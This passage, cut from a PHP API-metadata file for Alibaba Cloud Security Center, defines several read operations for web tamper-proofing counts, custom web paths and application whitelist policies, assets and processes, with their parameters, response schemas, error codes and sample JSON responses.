\\"WhiteCount\\": 6,\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"ExpireTime\\": 1688090851000,\\n \\"DirCount\\": 2,\\n \\"AuthCount\\": 32,\\n \\"BindCount\\": 2,\\n \\"BlockCount\\": 48\\n}","type":"json"}]', ], 'DescribeWebLockTotalFileChangeCount' => [ 'summary' => 'Queries the number of times that the files protected by web tamper proofing are changed.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The number of times that the files protected by web tamper proofing are changed.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'E70074C8-DFB4-44C5-96C7-909DD231D68A', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 200,\\n \\"RequestId\\": \\"E70074C8-DFB4-44C5-96C7-909DD231D68A\\"\\n}","type":"json"}]', 'title' => 'DescribeWebLockTotalFileChangeCount', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockTotalFileChangeCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockTotalFileChangeCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWebPath' => [ 'summary' => 'Queries custom web directories for security alerts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The alert configuration type. Valid values:'."\n" ."\n" .'- **web_path**.', 'type' => 'string', 'required' => false, 'example' => 'web_path', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Paging is used to display results.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Paging is used to display results.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query. Paging is used to display results.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query. Paging is used to display results.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The China Chinese Cloud generates a unique identifier for each request, which can be used for troubleshooting and diagnostics.', 'type' => 'string', 'example' => 'B37C9052-A73E-4707-A024-92477028****', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'ConfigList' => [ 'description' => 'The list of web paths.', 'type' => 'array', 'items' => [ 'description' => 'The web directory.', 'type' => 'object', 'properties' => [ 'WebPath' => ['description' => 'The web directory.', 'type' => 'string', 'example' => '/root/www****', 'title' => ''], 'WebPathType' => ['description' => 'The type of the web path. Valid values:'."\n" ."\n" .'- **def**: automatically identified by the system.'."\n" .'- **customize**: manually added.', 'type' => 'string', 'example' => 'def', 'title' => ''], 'TargetList' => [ 'description' => 'The list of servers on which the web directory takes effect.', 'type' => 'array', 'items' => [ 'description' => 'The web directory.', 'type' => 'object', 'properties' => [ 'Target' => ['description' => 'The target object.', 'type' => 'string', 'example' => '82048187-bb9b-4e19-8320-7b4ddb97****', 'title' => ''], 'TargetType' => ['description' => 'The target type. Valid values:'."\n" ."\n" .'- **uuid**.', 'type' => 'string', 'example' => 'uuid', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query custom web directories for security alerts', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebPath'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebPath', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"RequestId\\": \\"B37C9052-A73E-4707-A024-92477028****\\",\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2,\\n \\"ConfigList\\": [\\n {\\n \\"WebPath\\": \\"/root/www****\\",\\n \\"WebPathType\\": \\"def\\",\\n \\"TargetList\\": [\\n {\\n \\"Target\\": \\"82048187-bb9b-4e19-8320-7b4ddb97****\\",\\n \\"TargetType\\": \\"uuid\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeWhiteListAsset' => [ 'summary' => 'Queries the information about servers that can be added or are added to application whitelist policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '180.119.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'LastMaxId', 'in' => 'query', 'schema' => ['description' => 'The maximum asset ID of the most recent query.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1001', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy.'."\n" ."\n" .'> You can call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to obtain the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2730', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The policy type of the asset that you want to query. Valid values:'."\n" ."\n" .'* **1**: learning policy'."\n" .'* **2**: application policy'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Maximum value: **500**. Default value: **500**. This value indicates that 500 entries are displayed on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61****', 'title' => ''], 'Assets' => [ 'description' => 'The information about the servers.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the server.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '5c081b02-f66a-47a4-bd2f-79ee3eaf806a', 'title' => ''], 'GroupId' => ['description' => 'The group ID of the server.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '11028551', 'title' => ''], 'MachineIp' => ['description' => 'The IP address of the server.'."\n", 'type' => 'string', 'example' => '121.41.XX.XX', 'title' => ''], 'AllowSelected' => ['description' => 'Indicates whether the server can be selected. Valid values:'."\n" ."\n" .'* **0**: no'."\n" .'* **1**: yes'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Selected' => ['description' => 'Indicates whether the server is selected. Valid values:'."\n" ."\n" .'* **0**: no'."\n" .'* **1**: yes'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Id' => ['description' => 'The ID of the server.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1001', 'title' => ''], 'MachineName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61****\\",\\n \\"Assets\\": [\\n {\\n \\"Uuid\\": \\"5c081b02-f66a-47a4-bd2f-79ee3eaf806a\\",\\n \\"GroupId\\": 11028551,\\n \\"MachineIp\\": \\"121.41.XX.XX\\",\\n \\"AllowSelected\\": 1,\\n \\"Selected\\": 0,\\n \\"Id\\": 1001,\\n \\"MachineName\\": \\"test\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWhiteListAsset', 'description' => 'The application whitelist feature is in public preview. You cannot apply for a trial of the feature. If you applied for a trial of the feature or the feature is in use, you can call this operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWhiteListAsset', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWhiteListAuthorize' => [ 'summary' => 'Queries the number of available authorizations for the application whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains this value.', 'type' => 'string', 'required' => false, 'example' => '180.119.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'AvailableAuthorizeNum' => ['description' => 'The number of available authorizations.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve available authorization count', 'description' => 'The application whitelist is a China site China site public preview feature that is no longer open for new applications. Users who have already applied for or are using this feature can call this operation as expected.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWhiteListAuthorize', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"AvailableAuthorizeNum\\": 3,\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', ], 'DescribeWhiteListEffectiveAssets' => [ 'summary' => 'Queries the servers on which an application whitelist policy takes effect.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '27.212.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The condition that is used to query assets. You can enter an IP address, a public IP address, an private IP address, or an asset name for fuzzy match.'."\n", 'type' => 'string', 'required' => false, 'example' => '222.185.XX.XX', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy.'."\n" ."\n" .'> You can call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to obtain the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '8437592', 'title' => ''], ], [ 'name' => 'NeedStatistics', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to return the number of **untrusted programs**. Valid values:'."\n" ."\n" .'* **0**: no'."\n" .'* **1**: yes'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Maximum value: **1000**. Default value: 20. If you leave this parameter empty, 20 data entries are returned per page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: **1**. Pages start from page 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB39****', 'title' => ''], 'TotalCount' => ['description' => 'The total number of the servers on which the policy takes effect.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Assets' => [ 'description' => 'The servers on which the policy takes effect.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The server on which the policy takes effect.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '544900ff-1be7-4655-9719-6311cecb3****', 'title' => ''], 'StrategyId' => ['description' => 'The ID of the policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '35815387', 'title' => ''], 'StrategyName' => ['description' => 'The name of the policy.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '60.205.XX.XX', 'title' => ''], 'SuspiciousEventCount' => ['description' => 'The number of **untrusted programs** on the server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'ProcessMethod' => ['description' => 'The exception handling mode. Valid values:'."\n" ."\n" .'* **0**: unhandled'."\n" .'* **1**: alerted'."\n" .'* **2**: blocked'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MachineName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB39****\\",\\n \\"TotalCount\\": 100,\\n \\"Count\\": 10,\\n \\"Assets\\": [\\n {\\n \\"Uuid\\": \\"544900ff-1be7-4655-9719-6311cecb3****\\",\\n \\"StrategyId\\": 35815387,\\n \\"StrategyName\\": \\"test\\",\\n \\"InternetIp\\": \\"60.205.XX.XX\\",\\n \\"SuspiciousEventCount\\": 5,\\n \\"ProcessMethod\\": 1,\\n \\"MachineName\\": \\"test\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWhiteListEffectiveAssets', 'description' => 'The application whitelist feature is in public preview. You cannot apply for a trial of the feature. If you applied for a trial of the feature or the feature is in-use, you can call this operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWhiteListEffectiveAssets', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWhiteListProcess' => [ 'summary' => 'Queries the information about the processes that are detected in an application whitelist policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '27.223.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy.'."\n" ."\n" .'> You can call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to obtain the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '8562', 'title' => ''], ], [ 'name' => 'ProcessName', 'in' => 'query', 'schema' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'JAVA', 'title' => ''], ], [ 'name' => 'ProcessType', 'in' => 'query', 'schema' => ['description' => 'The type of the process. Valid values:'."\n" ."\n" .'* **1**: trusted'."\n" .'* **2**: suspicious'."\n" .'* **3**: malicious'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'OrderBy', 'in' => 'query', 'schema' => ['description' => 'The item based on which you want to sort the returned results. Default value: **process type**. Valid values:'."\n" ."\n" .'* **1**: process type'."\n" .'* **2**: degree of trustability'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Desc', 'in' => 'query', 'schema' => ['description' => 'The sort order. Default value: descending order. Valid values:'."\n" ."\n" .'* **1**: ascending order'."\n" .'* **2**: descending order'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Maximum value: 1000. Default value: 20. If you leave this parameter empty, 20 data entries are returned per page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: **1**. Pages start from page 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D81DD78E-E006-5C65-A171-C8CB09XXXXX', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '44', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Processes' => [ 'description' => 'The information about the processes.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the process.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'Indicates whether the process is trusted. Valid values:'."\n" ."\n" .'* **1**: no'."\n" .'* **2**: yes'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ProcessName' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'example' => 'vim', 'title' => ''], 'ProcessId' => ['description' => 'The ID of the process.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '53090', 'title' => ''], 'FilePath' => ['description' => 'The path to the process startup file.'."\n", 'type' => 'string', 'example' => '/root/bash1', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash value of the process startup file.'."\n", 'type' => 'string', 'example' => 'a28e8eba54ece1f3748d80e57dc89400', 'title' => ''], 'Id' => ['description' => 'The primary key of the process information.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2100019', 'title' => ''], 'Level' => ['description' => 'The trust score of the process.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '99', 'title' => ''], 'ProcessType' => ['description' => 'The type of the process. Valid values:'."\n" ."\n" .'* **1**: trusted'."\n" .'* **2**: suspicious'."\n" .'* **3**: malicious'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 200,\\n \\"RequestId\\": \\"D81DD78E-E006-5C65-A171-C8CB09XXXXX\\",\\n \\"TotalCount\\": 44,\\n \\"Count\\": 1,\\n \\"Processes\\": [\\n {\\n \\"Status\\": 1,\\n \\"ProcessName\\": \\"vim\\",\\n \\"ProcessId\\": 53090,\\n \\"FilePath\\": \\"/root/bash1\\",\\n \\"Md5\\": \\"a28e8eba54ece1f3748d80e57dc89400\\",\\n \\"Id\\": 2100019,\\n \\"Level\\": 99,\\n \\"ProcessType\\": 1\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWhiteListProcess', 'description' => 'The application whitelist feature is in public preview. You cannot apply for a trial of the feature. If you applied for a trial of the feature or the feature is in use, you can call this operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWhiteListProcess', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWhiteListStrategyList' => [ 'summary' => 'Queries a list of application whitelist policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '116.88.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '1,2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '571B2642-BF51-5BDD-906B-D2340DB9****', 'title' => ''], 'Strategies' => [ 'description' => 'The information about the policies.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the policy.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the policy. Valid values:'."\n" ."\n" .'* **0**: disabled'."\n" .'* **1**: learning'."\n" .'* **2**: paused'."\n" .'* **3**: learning completed'."\n" .'* **4**: enabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'StrategyId' => ['description' => 'The ID of the policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '8795555', 'title' => ''], 'StrategyName' => ['description' => 'The name of the policy.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'StudyTime' => ['description' => 'The intelligent learning duration. Unit: hour.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"571B2642-BF51-5BDD-906B-D2340DB9****\\",\\n \\"Strategies\\": [\\n {\\n \\"Status\\": 1,\\n \\"StrategyId\\": 8795555,\\n \\"StrategyName\\": \\"test\\",\\n \\"StudyTime\\": 5\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWhiteListStrategyList', 'description' => 'The application whitelist feature is in public preview. You cannot apply for a trial of the feature. If you applied for a trial of the feature or the feature is in use, you can call this operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWhiteListStrategyList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => 